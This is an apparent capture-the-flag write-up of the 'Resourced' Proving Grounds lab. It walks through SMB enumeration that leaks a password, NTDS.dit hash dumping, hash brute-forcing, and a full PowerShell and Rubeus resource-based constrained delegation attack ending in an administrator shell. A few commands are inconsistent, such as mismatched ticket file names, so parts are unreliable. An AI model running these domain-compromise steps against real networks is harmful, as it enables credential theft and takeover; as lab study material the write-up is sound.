Resourced - Proving Grounds Practice
Enumeration
Nmap
Initial Nmap scan revealed SMB and some common Active Directory ports were open.
SMB Enumeration
I could not find SMB Null session with nxc. However, enum4linux <IP> -a and rpclient -U '' -N <IP> helped me to access SMB informations available on target machine.
When you run the querydispinfo command inside rpcclient (or when enum4linux does this automatically), it triggers a specific RPC (Remote Procedure Call) to Windows in the background: SamrQueryDisplayInfo
This function effectively tells Windows: ‘Give me the list of users, but don’t just provide the names; also provide the details at the Display Information level (which includes descriptions/comments).’
And running enum4linux or querydispinfo command on rpcclient revealed a description field with password.
Exploitation
The password was correct, we could authenticate both smb and ldap.
So at first I checked SMB Shares and found Password Audit share which current user had READ access.
It included NTDS.dit, SYSTEM and SECURITY files.
So at first I mounted the share, because I could not transfer the files using smbclient. They were too big to transfer through smbclient.
sudo mount -t cifs '//192.168.128.175/Password Audit' myShare -osec=ntlmv2,domain=resourced.local,username=V.Ventz,password=HotelCalifornia194!
Then using impacket-secretsdump, I simply dumped all available hashes.
Then using nxc I brute forced usernames and hashes and found a valid hash for user L.Livingstone
And I simply logged in using evil-winrm and obtained user shell.
Privilege Escalation
Resource Based Contrained Delegation (RBCD)
Then I ran bloodhound-python and found that user had GenericAll privileges over Domain Controller.
So I could both apply RBCD steps to impersonate Administrator or I could change DC machine account password and login with it. I decided to apply RBCD steps.
These are the necessary commands and scripts to apply steps:
. .\Powermad.ps1
. .\PowerView.ps1
New-MachineAccount -MachineAccount testsystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer testsystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get-DomainComputer ResourceDC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
After these, we could simply use rubeus to obtain a TGS in base64 format. I copied the base64 and saved it on my attacker machine as kirbi.b64 file.
.\Rubeus.exe s4u /user:<fake computer name> /rc4:<Fake Computer Password Hash> /domain:<Domain> /impersonate:Administrator /msdspn:cifs/<Target Computer> /ptt /nowrap
Then I converted base64 to first kirbi then ccache files.
echo kirbi.b64 | base64 -d > ticket.ccache
impacket-ticketConverter ticket.kirbi ticket.ccache
and logged in using psexec with below command:
KRB5CCNAME=ticket.ccache impacket-psexec resourced.local/administrator@ResourceDC.resourced.local -k -no-pass